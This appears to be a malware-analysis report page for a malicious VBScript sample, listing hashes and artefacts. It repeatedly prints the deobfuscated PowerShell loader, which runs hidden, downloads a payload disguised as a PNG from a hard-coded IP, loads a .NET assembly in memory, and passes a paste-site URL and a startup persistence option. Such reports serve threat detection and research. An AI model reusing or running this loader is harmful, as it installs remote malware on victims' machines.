Malicious
Malicious

b5e360bf48a072a8fd3d9d80ffcb4151

VBScript
|
MD5: b5e360bf48a072a8fd3d9d80ffcb4151
|
Size: 59.99 KB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
b5e360bf48a072a8fd3d9d80ffcb4151
Sha1
58c64c7b6c9bf265ecb03303ff79c845637ab690
Sha256
b3e1a441845d5db54c8b20222f61259157d96a5c681ca893640d737b546e5420
Sha384
cad6744317337aad762e842fd8530055580441d41ff3c7cda484751f17426e14b47e727b2c022486a570ae14bae8d1b0
Sha512
e0d1354d5770695b0319d93c60d19683612c46f3e260d0f0699d3967365b3d9e3ebf89bd39ced0c98e5536c51bc700e873bd6e3b6f519f2120b227647a648a23
SSDeep
1536:fuHuU5+t4M/E8u6z8McVoqkAeuh5C6Vim1hiIacJmX1Bh5higvIKsXu54guD8CIA:zo8u6z8McVoqkAeuh5C6Vim1hiIacJmG
TLSH
0643410AD353255BC4C3AF839FD611FCF4B0D99B60EEDC603A7A479529E386082745E6
File Structure
b5e360bf48a072a8fd3d9d80ffcb4151
Malicious
b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTl5UnM1V2FXbHpjUDlDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9yRs5WaWlzcP9CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9yRs5WaWlzcP9CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTl5UnM1V2FXbHpjUDlDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"
Deobfuscated PowerShell

Invoke-Expression
b5e360bf48a072a8fd3d9d80ffcb4151 (59.99 KB)
File Structure
b5e360bf48a072a8fd3d9d80ffcb4151
Malicious
b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

b5e360bf48a072a8fd3d9d80ffcb4151
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTl5UnM1V2FXbHpjUDlDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"

Malicious

b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell

Invoke-Expression

Malicious

b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [PowerShell Command]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9yRs5WaWlzcP9CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))

Malicious

b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Base64-Block]
Deobfuscated PowerShell

Invoke-Expression

Malicious

b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "=cXYy9yRs5WaWlzcP9CcwFmL5ZWZ0NXYw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))

Malicious

b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9Y1hZeTl5UnM1V2FXbHpjUDlDY3dGbUw1WldaME5YWXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"

Malicious

b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]
Deobfuscated PowerShell

Invoke-Expression

Malicious

b5e360bf48a072a8fd3d9d80ffcb4151 > b5e360bf48a072a8fd3d9d80ffcb4151.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙